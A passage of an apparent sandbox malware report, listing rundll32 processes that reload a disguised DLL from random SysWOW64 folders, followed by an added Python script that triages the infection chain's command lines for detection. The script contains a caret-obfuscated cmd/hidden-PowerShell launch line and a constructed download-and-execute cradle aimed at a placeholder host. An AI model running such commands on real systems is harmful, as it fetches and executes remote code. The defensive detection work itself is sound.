                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:46
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:47
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
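
The process list above is the part of this report a responder would turn into detections: WINWORD.EXE launches cmd.exe with a caret-escaped command line, msg.exe shows the victim a fake "Word experienced an error" dialog, powershell.exe runs with -w hidden -enc, rundll32.exe then loads a DLL from the user profile, and a chain of 32-bit rundll32.exe processes reloads copies of it from randomly named SysWOW64 subdirectories with non-.dll extensions, every one through the same export, ShowDialogA. The following Python script is an added example, not part of this report or of the sandbox's tooling: it strips cmd.exe caret escaping, decodes an -EncodedCommand argument, parses rundll32 module/export pairs and flags the traits visible in these lines. The rundll32 command lines are copied from the report; the base64 payload is constructed here because the report's own is elided, and the flag names and the heuristics are the example's own.

```python
"""Triage of the process command lines in the System Behavior section above.

Added example (not part of the sandbox report). The rundll32 lines are copied
from the report; the cmd.exe line is copied with its elided -enc payload
replaced by a CONSTRUCTED base64 string so the decoder can run offline.
"""
import base64
import re


def strip_cmd_carets(cmdline: str) -> str:
    """Undo cmd.exe escaping: '^' quotes the next character, so m^s^g is msg.
    A caret before a space ("p^owe^rs^he^ll^ -w") simply disappears."""
    return re.sub(r"\^(.)", r"\1", cmdline)


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the argument is base64 of a UTF-16LE string.
ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script behind the first -EncodedCommand argument, else None.
    Run strip_cmd_carets first: '-^e^nc' is invisible to this regex."""
    for m in ENC_FLAG.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            return base64.b64decode(m.group(2)).decode("utf-16-le")
    return None


def triage_powershell(cmdline: str) -> list:
    """Heuristic flags for a de-obfuscated cmd/powershell command line."""
    low = cmdline.lower()
    flags = []
    if re.search(r"-w[a-z]*\s+hidden", low):          # -w / -WindowStyle hidden
        flags.append("hidden_window")
    if decode_encoded_command(cmdline) is not None:
        flags.append("encoded_command")
    if re.search(r"\bmsg\b.*&", low):                  # decoy error dialog, then payload
        flags.append("decoy_dialog_before_payload")
    return flags


def parse_rundll32(cmdline: str):
    """Return (module, export) for a rundll32 command line, else None.
    rundll32 takes '<module>,<export>' or '<module> <export>'; the sandbox
    renders a quoted module path with single quotes."""
    m = re.search(r"rundll32\.exe'?\s+(.*)$", cmdline, re.IGNORECASE)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith("'"):                           # quoted path (may contain spaces)
        end = rest.index("'", 1)
        module, tail = rest[1:end], rest[end + 1:]
    else:                                              # unquoted: ends at space or comma
        parts = re.split(r"[\s,]", rest, maxsplit=1)
        module, tail = parts[0], (parts[1] if len(parts) > 1 else "")
    tail = tail.strip(" ,")
    return module, (tail.split()[0] if tail else "")


SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")


def triage_rundll32(cmdline: str) -> list:
    """Flags for a rundll32 module: not a .dll, in a user profile, or dropped
    into a subdirectory of a Windows system directory (real system DLLs sit
    directly in System32/SysWOW64, so shell32.dll,Control_RunDLL stays clean)."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, _export = parsed
    low = module.lower()
    flags = []
    if not low.endswith(".dll"):
        flags.append("module_without_dll_extension")
    if low.startswith("c:\\users\\"):
        flags.append("module_in_user_profile")
    for d in SYSTEM_DIRS:
        if low.startswith(d) and "\\" in low[len(d):]:
            flags.append("module_in_system_subdirectory")
    return flags


# CONSTRUCTED stand-in for the elided payload (example.invalid is a reserved TLD).
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

# Caret-escaped cmd.exe line from the report, payload replaced by CONSTRUCTED_B64.
REPORT_CMD_LINE = (
    "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
    "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + CONSTRUCTED_B64
)
REPORT_RUNDLL32_LINES = [
    r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA",
]


def triage_chain(cmd_line: str, rundll32_lines: list) -> dict:
    """Run every check over the chain and collect the findings in one dict."""
    plain = strip_cmd_carets(cmd_line)
    modules = [p for p in (parse_rundll32(l) for l in rundll32_lines) if p]
    return {
        "cmd_flags": triage_powershell(plain),
        "decoded_script": decode_encoded_command(plain),
        "rundll32_flags": [triage_rundll32(l) for l in rundll32_lines],
        # one export name across every relocated module: the same payload under new names
        "shared_export": len({e for _, e in modules}) == 1,
    }


if __name__ == "__main__":
    for key, value in triage_chain(REPORT_CMD_LINE, REPORT_RUNDLL32_LINES).items():
        print(f"{key}: {value}")
```

Run it directly to print the findings for the chain. The checks are string heuristics over the command line only; they complement, and do not replace, the file-system and network signatures listed at the top of the report (PE files dropped into C:\Windows, a system process connecting to the network), which is what the sandbox's verdict rests on.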

                      Disassembly

                      Code Analysis
